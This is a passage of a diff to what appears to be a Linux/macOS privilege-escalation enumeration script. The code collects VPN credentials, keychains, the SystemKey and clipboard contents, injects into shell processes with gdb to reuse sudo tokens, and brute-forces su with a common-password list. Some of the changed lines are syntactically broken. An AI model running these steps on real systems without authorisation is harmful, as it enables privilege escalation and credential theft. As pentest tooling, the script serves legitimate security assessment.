"$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null echo "" - fi - done - fi + done < $Wfolder/.ips + + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done fi - - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" 
- rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" - - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" - - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" - - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} 
"s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," echo "" - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; 
- fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType echo "" - #-- UI) Clipboard and highlighted text - print_2title "Clipboard or highlighted text?" - if [ "$(command -v xclip 2>/dev/null)" ]; then - echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v xsel 2>/dev/null)" ]; then - echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v pbpaste 2>/dev/null)" ]; then - echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - else echo_not_found "xsel and xclip" - fi + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType echo "" - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found 
"sudo" + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q users_information; +print_title "Users Information" +########################################### +#----------) Users Information (----------# +########################################### +print_title "Users Information" + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | 
sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," + echo "" +fi + +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" + +#-- UI) Clipboard and highlighted text +print_2title "Clipboard or highlighted text?" +if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +else echo_not_found "xsel and xclip" +fi +echo "" + +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" 
| sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in 
PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break fi done - echo "" + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! 
"$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" +#-- UI) Doas +print_2title "Checking doas.conf" +doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) +if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," +else echo_not_found "doas.conf" +fi +echo "" + +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" + 
+#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - fi - echo "" - - #-- UI) Doas - print_2title "Checking doas.conf" - doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) - if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then - cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," - else echo_not_found "doas.conf" - fi - echo "" - - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" - - #-- UI) Superusers - 
print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . 
list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . 
-read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" fi done fi - echo "" +fi +echo "" - #-- UI) Password policy - print_2title "Password policy" - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . 
list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" - if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" - defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null - echo "" +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" - print_2title "Guest user status" - sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - echo "" - fi +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! 
[ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed 